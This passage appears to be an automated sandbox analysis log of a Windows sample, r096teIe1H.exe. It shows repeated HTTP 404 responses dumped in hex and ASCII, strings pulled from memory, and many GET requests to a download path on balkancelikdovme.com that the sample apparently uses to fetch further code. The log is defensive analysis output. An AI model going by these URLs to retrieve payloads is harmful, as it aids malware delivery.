style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:07 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:07 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:09:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;

Source: r096teIe1H.exe, 00000000.00000002.242498292.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://://t.exet.exe
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/
Source: r096teIe1H.exe, 00000000.00000002.242554259.000000000083B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveks
Source: r096teIe1H.exe, 00000000.00000002.245452941.00000000092C3000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/XezdxpgykmkH
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkl
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkl.O
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkzp
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/ll
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/llb
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/llg
Source: r096teIe1H.exe, 00000000.00000002.242554259.00000000007E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/lln
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: r096teIe1H.exe, r096teIe1H.exe, 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.242673568.00000000022D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com

Source: unknown

DNS traffic detected: queries for: balkancelikdovme.com

Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
